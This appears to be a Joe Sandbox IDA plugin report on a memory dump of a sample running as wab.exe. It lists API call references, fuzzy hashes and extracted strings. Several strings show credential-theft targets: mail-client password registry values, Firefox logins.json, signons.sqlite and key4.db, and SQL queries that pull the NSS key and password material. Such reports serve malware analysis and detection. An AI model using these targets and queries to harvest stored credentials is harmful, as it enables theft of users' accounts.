                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID:
                  • API String ID: 3473537107-0
                  • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                  • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                  • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                  • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                  APIs
                  • memset.MSVCRT ref: 004109F7
                    • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                    • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                  • memset.MSVCRT ref: 00410A32
                  • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileStringmemset$Writememcpysprintf
                  • String ID:
                  • API String ID: 3143880245-0
                  • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                  • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                  • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                  • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@
                  • String ID:
                  • API String ID: 1033339047-0
                  • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                  • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                  • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                  • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??3@mallocmemcpy
                  • String ID:
                  • API String ID: 3831604043-0
                  • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                  • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                  • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                  • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                  APIs
                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                  • CreateFontIndirectA.GDI32(?), ref: 004070A6
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFontIndirect_mbscpymemset
                  • String ID: Arial
                  • API String ID: 3853255127-493054409
                  • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                  • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                  • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                  • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                  • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                  • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                  APIs
                    • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                    • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                  • _strcmpi.MSVCRT ref: 0040CEC3
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$_strcmpimemset
                  • String ID: /stext
                  • API String ID: 520177685-3817206916
                  • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                  • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                  • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                  • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction ID: 5df47aada64e755ddaac71019e2cddcac14d14db73bdb0f929895f2225ac57a9
                  • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                  • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                  APIs
                  • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                  • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ProtectVirtual
                  • String ID:
                  • API String ID: 544645111-0
                  • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                  • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                  • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                  APIs
                    • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                  • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc
                  • String ID:
                  • API String ID: 145871493-0
                  • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                  • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                  • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                  • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                  APIs
                  • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                    • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                    • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                    • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfile$StringWrite_itoamemset
                  • String ID:
                  • API String ID: 4165544737-0
                  • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                  • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                  • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                  • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                  APIs
                  • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                  • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                  • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                  • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                  APIs
                  • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                  • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                  • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                  • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                  APIs
                  • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FreeLibrary
                  • String ID:
                  • API String ID: 3664257935-0
                  • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                  • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                  • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                  • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                  APIs
                  • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: EnumNamesResource
                  • String ID:
                  • API String ID: 3334572018-0
                  • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                  • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                  • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                  • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                  APIs
                  • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseFind
                  • String ID:
                  • API String ID: 1863332320-0
                  • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                  • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                  • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                  • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                  APIs
                  • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Open
                  • String ID:
                  • API String ID: 71445658-0
                  • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                  • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                  • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                  • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                  APIs
                  • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: AttributesFile
                  • String ID:
                  • API String ID: 3188754299-0
                  • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                  • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                  • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                  • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: PrivateProfileString_mbscmpstrlen
                  • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                  • API String ID: 3963849919-1658304561
                  • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                  • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                  • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                  • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@??3@memcpymemset
                  • String ID: (yE$(yE$(yE
                  • API String ID: 1865533344-362086290
                  • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                  • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                  • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                  • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                  APIs
                    • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                    • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                    • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                    • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                    • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                  • memset.MSVCRT ref: 0040E5B8
                  • memset.MSVCRT ref: 0040E5CD
                  • _mbscpy.MSVCRT ref: 0040E634
                  • _mbscpy.MSVCRT ref: 0040E64A
                  • _mbscpy.MSVCRT ref: 0040E660
                  • _mbscpy.MSVCRT ref: 0040E676
                  • _mbscpy.MSVCRT ref: 0040E68C
                  • _mbscpy.MSVCRT ref: 0040E69F
                  • memset.MSVCRT ref: 0040E6B5
                  • memset.MSVCRT ref: 0040E6CC
                    • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                    • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                  • memset.MSVCRT ref: 0040E736
                  • memset.MSVCRT ref: 0040E74F
                  • sprintf.MSVCRT ref: 0040E76D
                  • sprintf.MSVCRT ref: 0040E788
                  • _strcmpi.MSVCRT ref: 0040E79E
                  • _strcmpi.MSVCRT ref: 0040E7B7
                  • _strcmpi.MSVCRT ref: 0040E7D3
                  • memset.MSVCRT ref: 0040E858
                  • sprintf.MSVCRT ref: 0040E873
                  • _strcmpi.MSVCRT ref: 0040E889
                  • _strcmpi.MSVCRT ref: 0040E8A5
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                  • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                  • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                  • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                  • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                  • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                  • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                  • GetWindowRect.USER32(00000000,?), ref: 0041047C
                  • GetWindowRect.USER32(?,?), ref: 00410487
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                  • GetDC.USER32 ref: 004104E2
                  • strlen.MSVCRT ref: 00410522
                  • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                  • ReleaseDC.USER32(?,?), ref: 00410580
                  • sprintf.MSVCRT ref: 00410640
                  • SetWindowTextA.USER32(?,?), ref: 00410654
                  • SetWindowTextA.USER32(?,00000000), ref: 00410672
                  • GetDlgItem.USER32(?,00000001), ref: 004106A8
                  • GetWindowRect.USER32(00000000,?), ref: 004106B8
                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                  • GetClientRect.USER32(?,?), ref: 004106DD
                  • GetWindowRect.USER32(?,?), ref: 004106E7
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                  • GetClientRect.USER32(?,?), ref: 00410737
                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                  Strings
                  Similarity
                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                  • String ID: %s:$EDIT$STATIC
                  APIs
                  • memset.MSVCRT ref: 004024F5
                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                  • _mbscpy.MSVCRT ref: 00402533
                  • _mbscpy.MSVCRT ref: 004025FD
                  Strings
                  Similarity
                  • API ID: _mbscpy$QueryValuememset
                  • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                  APIs
                  • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                  • GetDlgItem.USER32(?,000003EE), ref: 00401103
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                  • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                  • LoadCursorA.USER32(00000067), ref: 0040115F
                  • SetCursor.USER32(00000000,?,?), ref: 00401166
                  • GetDlgItem.USER32(?,000003EE), ref: 00401186
                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                  • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                  • SetBkMode.GDI32(?,00000001), ref: 004011B9
                  • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                  • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                  • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                  • EndDialog.USER32(?,00000001), ref: 0040121A
                  • DeleteObject.GDI32(?), ref: 00401226
                  • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                  • ShowWindow.USER32(00000000), ref: 00401253
                  • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                  • ShowWindow.USER32(00000000), ref: 00401262
                  • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                  • memset.MSVCRT ref: 0040128E
                  • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                  • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                  • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                  Similarity
                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                  • String ID:
                  APIs
                  Strings
                  Similarity
                  • API ID: memcmp$memcpy
                  • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                  APIs
                  Strings
                  Similarity
                  • API ID: _mbscat$memsetsprintf$_mbscpy
                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                  APIs
                  Strings
                  • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                  • , xrefs: 00406834
                  • key4.db, xrefs: 00406756
                  • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                  Similarity
                  • API ID: memcpy$memcmp$memsetstrlen
                  • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                  APIs
                  Strings
                  Similarity
                  • API ID: sprintf$memset$_mbscpy
                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                  APIs
                    • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                    • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                    • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                    • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                    • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                    • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                    • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                    • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                  • strlen.MSVCRT ref: 0040F139
                  • strlen.MSVCRT ref: 0040F147
                  • memset.MSVCRT ref: 0040F187
                  • strlen.MSVCRT ref: 0040F196
                  • strlen.MSVCRT ref: 0040F1A4
                  • memset.MSVCRT ref: 0040F1EA
                  • strlen.MSVCRT ref: 0040F1F9
                  • strlen.MSVCRT ref: 0040F207
                  • _strcmpi.MSVCRT ref: 0040F2B2
                  • _mbscpy.MSVCRT ref: 0040F2CD
                  • _mbscpy.MSVCRT ref: 0040F30E
                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                  Strings
                  Similarity
                  • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                  • String ID: logins.json$none$signons.sqlite$signons.txt
                  APIs
                  Strings
                  Similarity
                  • API ID: _mbscpy$FileModuleNamePlacementWindow_mbscatmemsetstrrchr
                  • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                  APIs
                  • memset.MSVCRT ref: 00444612
                    • Part of subcall function 00444462: strlen.MSVCRT ref: 0044446F
                  • strlen.MSVCRT ref: 0044462E
                  • memset.MSVCRT ref: 00444668
                  • memset.MSVCRT ref: 0044467C
                  • memset.MSVCRT ref: 00444690
                  • memset.MSVCRT ref: 004446B6
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D296
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2C2
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2D8
                    • Part of subcall function 0040D2A3: memcpy.MSVCRT ref: 0040D30F
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D319
                  • memcpy.MSVCRT ref: 004446ED
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D248
                    • Part of subcall function 0040D205: memcpy.MSVCRT ref: 0040D272
                    • Part of subcall function 0040D2A3: memset.MSVCRT ref: 0040D2EA
                  • memcpy.MSVCRT ref: 00444729
                  • memcpy.MSVCRT ref: 0044473B
                  • _mbscpy.MSVCRT ref: 00444812
                  • memcpy.MSVCRT ref: 00444843
                  • memcpy.MSVCRT ref: 00444855
                  Strings
                  Similarity
                  • API ID: memcpymemset$strlen$_mbscpy
                  • String ID: salu
                  APIs
                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
